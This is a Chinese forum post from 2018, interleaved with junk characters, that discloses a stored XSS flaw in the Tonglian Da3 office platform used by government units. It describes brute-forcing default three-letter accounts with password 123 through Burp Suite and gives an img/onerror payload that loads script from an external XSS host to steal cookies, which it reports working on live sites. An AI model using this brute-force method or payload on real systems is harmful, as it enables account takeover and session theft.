2 v, B! A. W! A" P O% L% O 9 V- y% l0 C/ n! C& `
同联Da3协同办公平台后台通用储存型xss漏洞
* }$ q: M4 r* l8 }; _
4 u, o& f' l* o/ E0 L
& x# ]% r9 u, F; Y; Y3 @8 m 平台简介:
7 {4 Y U5 c9 T! |' i. G
3 }- X5 f* j+ W" v- r9 O- N& c 4 h* c- \* r8 E
) Q9 f' o$ O! B. L0 j2 ^/ c1 v
+ q& Z. o) I9 |5 V$ s" r
/ L5 [, t$ M" i- R( I0 y
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( z4 h7 Z" Q# U; F& C( b9 \同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 p2 ?4 N) R! f0 j( ^1 |
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
3 e, V. G3 ~% z% H5 D$ V- }' @
- T. O) ?, B- y& o" C* A' |% ~ 5 L0 p2 e& }4 s
4 D# j' C1 N$ `9 [9 A: h
& t9 U) K1 r4 I! E) _: s
! X* \3 E$ d+ ?0 Y* |' h
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; E! n6 A3 n- I) R
n1 |! p g {4 u: `' n: Y8 w
! |1 V L9 [4 n' m0 G3 i 7 g& _5 C$ R/ U6 L; _5 C
o4 w/ g9 F7 P( s/ u0 X0 {& A6 _( \+ p 9 M" q1 L; w& k& N
http://1.1.1.1:7197/cap-aco/#(案例2-)+ m; D1 Q: ?) Q6 j8 b
9 u: r9 N& C1 E
! ]8 T6 V( C. P http://www.XXOO.com (案例1-官网网站)
! L# _/ F7 {0 B% P" d' s
- E" M. t8 m2 j) @$ R% n
+ b) {6 h% d; d
漏洞详情:
, u+ l; |6 w8 m3 v; m
$ q! v; I& w$ F* d d! } 1 J, N5 y. M/ H% z- G, [
案例一、8 q7 L0 \& [& t# x* T
/ i7 ]: P( L+ F2 `& _
: N5 g# y$ E5 z2 p0 g M) ]* c 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试* L5 t# C: M" B
: w4 A ?: l, K K1 [- z% q
( t8 L3 }$ l s0 Z/ ]+ [ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
! j' G% W8 ^5 Q1 K7 {
6 @/ p8 a7 e1 ]+ n4 p$ D3 ~
}7 k o2 j# U; m& u" B2 T" E
1 x, ]) F7 B# k. n% q4 ]1 `
?( K# h L/ F. a
" f0 n5 ~# C( P+ g: j0 x5 ? 
$ ^# O m! j: o" p
+ R l& a* y. K; {3 J% Z
* _$ A( i; B+ j# U: ^7 s. R( c$ h
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
$ u$ z2 N1 m5 i. ?0 a# x
. L) w3 S K! O# o5 [ - u& P o$ `; j X) k% S
) n4 c- ?' |1 z3 L+ V1 E6 X
2 P+ v1 g; L! T8 |3 R3 m 8 k1 z3 Z& K5 ~. s7 ~
- X3 u8 R8 y/ }- l
7 v8 u! a' S$ ~4 V7 u/ {8 C7 W
# ^# k% w; L. B) ~0 k" o 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
$ F, R+ } B; n) M
! [9 G: H: P" T2 _' A
+ A3 s* ^& O$ _2 `3 ^# d " b( v: F- |7 ?* @5 O
4 G# [' ?% f1 _ A, M4 ?
( \8 i, ?4 e3 t# V4 }# g <img src=x3 K+ g5 T# O* o8 i
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
% K+ T+ i3 J, z! s( L) R
1 {: `+ l7 n2 k9 }
) w3 d* [; I0 @5 H 
+ ^% f" F/ P( j
1 O2 }4 ] E- t7 e1 N1 d 1 n* t/ n' V! u M9 O/ m3 \
然后发送,接收cookie如图:
' ^% O, g& ^$ V6 ?; a
0 B9 h+ C$ E0 b9 T $ j1 c. v0 o2 z. n1 k
& d3 W9 @# `! V, Z/ F. ?
( s% s# [; }3 {2 |% | " ~. W C$ ]" q$ J: x! ]( H' P
+ n$ M7 b, j- R8 E h5 }0 v
# @5 n; f/ G0 j9 x+ o
% E' U7 p! W' v6 U5 f # x& u+ P$ I; n! f: p
. Q- Q! i* g# B' ^: [2 @5 [% y * h* x1 H4 T3 ^' x
: v6 s$ V4 p. j) y* |
6 R/ b1 q& J9 Q. F! z: j" o8 C4 W; {" X - |: f! k$ y y/ H4 D' m7 u
8 q; S3 m: z" H j" x7 K9 L
3 a4 i1 h! `# H
6 ^8 U- e( t' }& B+ Z0 H 
/ I+ K! p" u7 l$ e; ?
; D6 ?% |1 q( _7 T
! B! s5 d; m Z$ E: P
! \' @4 w; J. X+ q
+ }$ c0 Z" T! t1 q5 `
2 q* v9 C( X' |$ o8 a 案例2、 ' q' H- P* Y' z: `1 z" a, g
- s& l5 e, B+ `+ @) M8 l/ r
8 x& u- o7 A$ ?) _, k6 R 前面步骤都一样,下面看效果图:
" c w& Q3 b- C4 z: K
9 r& P& M# ^, i4 q/ |
# F" z5 u$ H# X! Y- X- M 
& N( l3 a7 ?/ |1 |( C$ R6 W" j+ V
: Q7 i8 L+ ?) C5 h: ~7 \ : N8 e" \- P6 p+ z8 ]
6 H* m: S. I' W; b. E
' h% d4 ?* K) f. N4 u3 n& G 1 N2 l2 |& P# T7 L+ N+ n6 I
$ X$ ~+ A: J- z
- G$ J1 O, J$ B6 r5 I7 W. G. |# ^ 9 H7 n$ g, g) [" a+ S
7 V2 U( U. H! j8 x/ J6 m/ q
z; C, b; W1 S / f2 R) ~# j- W! z# ]' U
6 D* b7 Y" j7 ]: r/ H- B# n
6 f9 }- _/ o# D) l ( \) z2 y O$ [5 R, O# j
% z% f3 \/ R- q+ N2 a- A- C
2 n2 e: m: I) @) @1 w( s$ l, z : D' R; d- Y# v3 w! T1 N8 a
; q$ t; c. C/ V
6 F1 b: j2 G: q) q. a* I; l 9 b. Q3 f+ M1 V: B
4 H1 g9 ~) G2 ?+ D6 m+ h
! T$ M- [) L* n9 |$ i! ^
( k6 _& L% |0 K ' d6 s, }3 Q, O: {3 D% U
/ T' ^7 l/ A1 J: b! U 
发表于 2018-10-20 20:14:15
收藏
分享
支持
反对